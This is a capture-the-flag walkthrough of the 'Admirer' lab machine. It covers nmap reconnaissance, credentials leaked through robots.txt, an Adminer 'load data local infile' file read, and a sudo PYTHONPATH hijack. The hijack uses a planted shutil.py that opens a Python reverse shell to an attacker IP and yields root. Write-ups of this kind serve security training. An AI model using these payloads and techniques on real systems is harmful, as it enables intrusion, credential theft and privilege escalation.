admirer

1.  
2. # Nmap 7.80 scan initiated Sat May 2 17:43:44 2020 as: nmap -sC -sV -oN nmap/admirer 10.10.10.187
3. Nmap scan report for 10.10.10.187
4. Host is up (0.26s latency).
5. Not shown: 997 closed ports
6. PORT STATE SERVICE VERSION
7. 21/tcp open ftp vsftpd 3.0.3
8. 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
9. | ssh-hostkey:
10. | 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
11. | 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
12. |_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
13. 80/tcp open http Apache httpd 2.4.25 ((Debian))
14. | http-robots.txt: 1 disallowed entry
15. |_/admin-dir
16. |_http-server-header: Apache/2.4.25 (Debian)
17. |_http-title: Admirer
18. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
19.  
20. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
21. # Nmap done at Sat May 2 17:44:20 2020 -- 1 IP address (1 host up) scanned in 35.61 seconds
22.  
23.  
24. Running gobuster don’t reveal much but before that itself i had opened http://10.10.10.187/robots.txt
25.  
26.  
27.  
28. User-agent: *
29.  
30. # This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
31. Disallow: /admin-dir
32.  
33.  
34.  
35. Following the waldo i download http://10.10.10.187/admin-dir/contacts.txt and http://10.10.10.187/admin-dir/credentials.txt which reveal the ftp password
36.  
37. as
38.  
39. ftpuser
40. %n?4Wz}R$tTF7
41.  
42.  
43. using that creds on ftp i downloaded html.tar.gz and dump.sql
44. checking the html dump i saw something intresting in utility-scripts/db_admin.php
45.  
46.  
47. <?php
48. $servername = "localhost";
49. $username = "waldo";
50. $password = "Wh3r3_1s_w4ld0?";
51.  
52. // Create connection
53. $conn = new mysqli($servername, $username, $password);
54.  
55. // Check connection
56. if ($conn->connect_error) {
57. die("Connection failed: " . $conn->connect_error);
58. }
59. echo "Connected successfully";
60.  
61.  
62. // TODO: Finish implementing this or find a better open source alternative
63. ?>
64.  
65.  
66.  
67.  
68.  
69. also saw admin_tasks.php had
70.  
71.  
72. <?php
73. if($task == '1' || $task == '2' || $task == '3' || $task == '4' ||
74. $task == '5' || $task == '6' || $task == '7')
75. {
76.  
77. echo str_replace("\n", "<br />", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
78. }
79. else
80. {
81. echo("Invalid task.");
82. }
83. ?>
84.  
85. but playing around a lot i was unable to bypass the if condition
86.  
87. so i tried all the passwords i already had on ssh with all the username.
88.  
89. http://10.10.10.187/utility-scripts/adminer.php
90.  
91. reading on blog shows that we can connect mysql of our local hosted by me
92.  
93.  
94. Dumping data to Table
95.  
96. load data local infile '../index.php'
97. into table data
98. fields terminated by "\n"
99.  
100. which dump index.php which have the dbpassword as &<h5b~yK3F#{PaPB&dA}{H>
101.  
102. Using that on ssh for user waldo and using the db password we can get user shell
103.  
104. and we have user.txt
105.  
106.  
107. Privilege Escalation
108. Running sudo -l
109.  
110. Matching Defaults entries for waldo on admirer:
111. env_reset, env_file=/etc/sudoenv, mail_badpass,
112. secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
113.  
114. User waldo may run the following commands on admirer:
115. (ALL) SETENV: /opt/scripts/admin_tasks.sh
116.  
117. we see we can run /opt/scripts/admin_tasks.sh reading the code
118.  
119.  
120.  
121. #!/bin/bash
122.  
123. view_uptime()
124. {
125. /usr/bin/uptime -p
126. }
127.  
128. view_users()
129. {
130. /usr/bin/w
131. }
132.  
133. view_crontab()
134. {
135. /usr/bin/crontab -l
136. }
137.  
138. backup_passwd()
139. {
140. if [ "$EUID" -eq 0 ]
141. then
142. echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
143. /bin/cp /etc/passwd /var/backups/passwd.bak
144. /bin/chown root:root /var/backups/passwd.bak
145. /bin/chmod 600 /var/backups/passwd.bak
146. echo "Done."
147. else
148. echo "Insufficient privileges to perform the selected operation."
149. fi
150. }
151.  
152. backup_shadow()
153. {
154. if [ "$EUID" -eq 0 ]
155. then
156. echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
157. /bin/cp /etc/shadow /var/backups/shadow.bak
158. /bin/chown root:shadow /var/backups/shadow.bak
159. /bin/chmod 600 /var/backups/shadow.bak
160. echo "Done."
161. else
162. echo "Insufficient privileges to perform the selected operation."
163. fi
164. }
165.  
166. backup_web()
167. {
168. if [ "$EUID" -eq 0 ]
169. then
170. echo "Running backup script in the background, it might take a while..."
171. /opt/scripts/backup.py &
172. else
173. echo "Insufficient privileges to perform the selected operation."
174. fi
175. }
176.  
177. backup_db()
178. {
179. if [ "$EUID" -eq 0 ]
180. then
181. echo "Running mysqldump in the background, it may take a while..."
182. #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
183. /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
184. else
185. echo "Insufficient privileges to perform the selected operation."
186. fi
187. }
188.  
189.  
190.  
191. # Non-interactive way, to be used by the web interface
192. if [ $# -eq 1 ]
193. then
194. option=$1
195. case $option in
196. 1) view_uptime ;;
197. 2) view_users ;;
198. 3) view_crontab ;;
199. 4) backup_passwd ;;
200. 5) backup_shadow ;;
201. 6) backup_web ;;
202. 7) backup_db ;;
203.  
204. *) echo "Unknown option." >&2
205. esac
206.  
207. exit 0
208. fi
209.  
210.  
211. # Interactive way, to be called from the command line
212. options=("View system uptime"
213. "View logged in users"
214. "View crontab"
215. "Backup passwd file"
216. "Backup shadow file"
217. "Backup web data"
218. "Backup DB"
219. "Quit")
220.  
221. echo
222. echo "[[[ System Administration Menu ]]]"
223. PS3="Choose an option: "
224. COLUMNS=11
225. select opt in "${options[@]}"; do
226. case $REPLY in
227. 1) view_uptime ; break ;;
228. 2) view_users ; break ;;
229. 3) view_crontab ; break ;;
230. 4) backup_passwd ; break ;;
231. 5) backup_shadow ; break ;;
232. 6) backup_web ; break ;;
233. 7) backup_db ; break ;;
234. 8) echo "Bye!" ; break ;;
235.  
236. *) echo "Unknown option." >&2
237. esac
238. done
239.  
240. exit 0
241.  
242.  
243.  
244.  
245. checking backup_web function we see that its running /opt/scripts/backup.py &
246.  
247.  
248. backup_web()
249. {
250. if [ "$EUID" -eq 0 ]
251. then
252. echo "Running backup script in the background, it might take a while..."
253. /opt/scripts/backup.py &
254. else
255. echo "Insufficient privileges to perform the selected operation."
256. fi
257. }
258.  
259.  
260.  
261.  
262. and we see the python script
263.  
264.  
265.  
266. #!/usr/bin/python3
267. from shutil import make_archive
268. src = '/var/www/html/'
269. # old ftp directory, not used anymore
270. #dst = '/srv/ftp/html'
271. dst = '/var/backups/html'
272. make_archive(dst, 'gztar', src)
273. You have new mail in /var/mail/waldo
274.  
275.  
276.  
277. seeing that we have SETENV so we can do some path hijack and PYTHONPATH variable and
278.  
279. create a file as shutil.py and keep
280.  
281.  
282.  
283. import os
284. import pty
285. import socket
286.  
287. lhost = "10.10.14.174"
288. lport = 4444
289.  
290. ZIP_DEFLATED = 0
291.  
292. class ZipFile:
293. def close(*args):
294. return
295.  
296. def write(*args):
297. return
298.  
299. def __init__(self, *args):
300. return
301.  
302. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
303. s.connect((lhost, lport))
304. os.dup2(s.fileno(),0)
305. os.dup2(s.fileno(),1)
306. os.dup2(s.fileno(),2)
307. os.putenv("HISTFILE",'/dev/null')
308. pty.spawn("/bin/bash")
309. s.close()
310.  
311.  
312.  
313.  
314. and running a nc listener and running
315.  
316. sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6
317.  
318.  
319. and we have root now :)